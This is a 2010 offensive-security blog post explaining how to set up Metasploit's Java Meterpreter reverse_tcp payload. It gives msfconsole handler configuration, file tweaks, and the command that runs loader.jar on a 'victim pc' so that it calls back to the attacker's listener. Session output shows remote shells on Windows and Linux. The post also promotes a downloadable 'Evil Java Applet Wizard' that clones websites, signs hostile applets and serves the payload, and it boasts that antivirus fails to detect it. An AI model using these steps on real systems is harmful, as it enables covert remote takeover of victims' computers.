Metasploit Java Meterpreter Payload
If you haven’t noticed the Metasploit Framework has a JAVA meterpreter payload for some time now
It supports all the commands supported by the PHP meterpreter, as of SVN revision 9777, and additionally the ipconfig, route, and screenshot commands.
It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.
In this post I will show how to set it up and use it.
Further more, I have recreated my “Evil java applet wizard” to automate the the process of getting it up and running.
The script now supports a full java attack which includes the client side applet attack and uses the meterpreter java payload instead a binary executable.
Why using a java meterpreter you ask ?
Well…you’ll see later…
Requirements:
JRE 1.2 on the victim machine is enough although some features, like routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.
You can find the java meterpreter payload jar file in:
"/pentest/exploits/framework3/data/java/loader.jar"
You will also need the “JavaMeterpreter.zip” file which you can download from HERE
I have just noticed that manual tweaking is no longer necessary the Metasploit framework now has the java meterpreter listener built in.
That means you can skip steps 1 to 4
and instead of using the patched php meterpreter you can use the java meterpreter directly.
I have also updated the script to use the java payload as well.
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) >
Lets see how to set it up manually...
1. Download
root@Blackbox:~# cd /tmp/ root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate
2. Unzip
root@Blackbox:/tmp# unzip JavaMeterpreter.zip
3. Copy necessary files
root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter
4. Backup PHP Meterpreter files and Change jar files extensions to php (This will break PHP Meterpreter support)
root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php
5. Launch msfconsole and setup a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd .. root@Blackbox:/pentest/exploits/framework3/data# cd .. root@Blackbox:/pentest/exploits/framework3# ./msfconsole
__. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ \/ \/ |__| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 577 exploits - 295 auxiliary + -- --=[ 212 payloads - 27 encoders - 8 nops =[ svn r9993 updated today (2010.08.13) msf > use exploit/multi/handler smsf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 0.0.0.0 LHOST => 0.0.0.0 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Started reverse handler on 0.0.0.0:4444 [*] Starting the payload handler...
6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to victim pc and run it as follows
C:\Documents and Settings\NightRanger>java -jar loader.jar Usage: java -jar loader.jar []
C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444
7. Get your Meterpreter JAVA Shell…
[*] Sending stage (21717 bytes) to 192.168.1.106 [*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010 meterpreter > sysinfo Computer: exploit OS : Windows XP 5.1 (x86) meterpreter > getuid Server username: NightRanger meterpreter >
P.S:
The java meterpreter will work for linux systems as well….
root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444
meterpreter > exit [*] Meterpreter session 1 closed. Reason: User exit msf exploit(handler) > rexploit [*] Started reverse handler on 0.0.0.0:4444 [*] Starting the payload handler... [*] Sending stage (21717 bytes) to 192.168.1.104 [*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010 meterpreter > sysinfo Computer: Blackbox OS : Linux 2.6.34 (i386) meterpreter > getuid Server username: root meterpreter >
I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.
The reasons for that are:
1. Antivirus software will not detect JAVA Meterpreter as a malicious file (as you can see in the demo video below).
2. It make sense to use the Java Meterpreter payload if you are already using athe JAVA Applet client side attack vector.
If it worked it means that the victim has Java installed on his system which allowes us to use this payload.
Demo:
Metasploit JAVA Meterpreter from NightRanger on Vimeo.
Script requirements are:
#!/usr/bin/python ''' Created on Jul 4, 2010 Code Updated on Aug 17, 2010 @Author: NightRanger, http://exploit.co.il This script designed and tested on BackTrack 4 final with metasploit v3.4.2-dev Requirements: JAVA JDK: Install using: "apt-get install sun-java6-jdk" Meterpreter JAVA Payload (loader.jar) must exist in: "/pentest/exploits/framework3/data/java/loader.jar" Script features: ---------------- - Generates java applet code on the fly - Generates Keystore / Keystore Removal - Compiles applet code - Package and sings JAR file - Web site cloning - Generates applet html code - Creates a meterpreter JAVA payload - Starts apache web server - Starts MSFConsole listener * Java applet source code found in the wild, decompiled and tweaked. * Website clone wget syntax taken from SET. '''
Download the script :
The script is designed for attacking windows operating systems
Title : jaw.tar.gz
Caption : Java Applet Wizard
File name : jaw.tar.gz
Size : 4 kB
References:
https://www.metasploit.com/redmine/issues/406
http://schierlm.users.sourceforge.net/JavaPayload/
http://www.metasploit.com/modules/payload/java/meterpreter/reverse_tcp
http://seclists.org/metasploit/2010/q3/134
LowValueTarget
Good Stuff!
Week 33 in Review – 2010 | Infosec Events
[...] Metasploit Java Meterpreter Payload – exploit.co.il It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed. [...]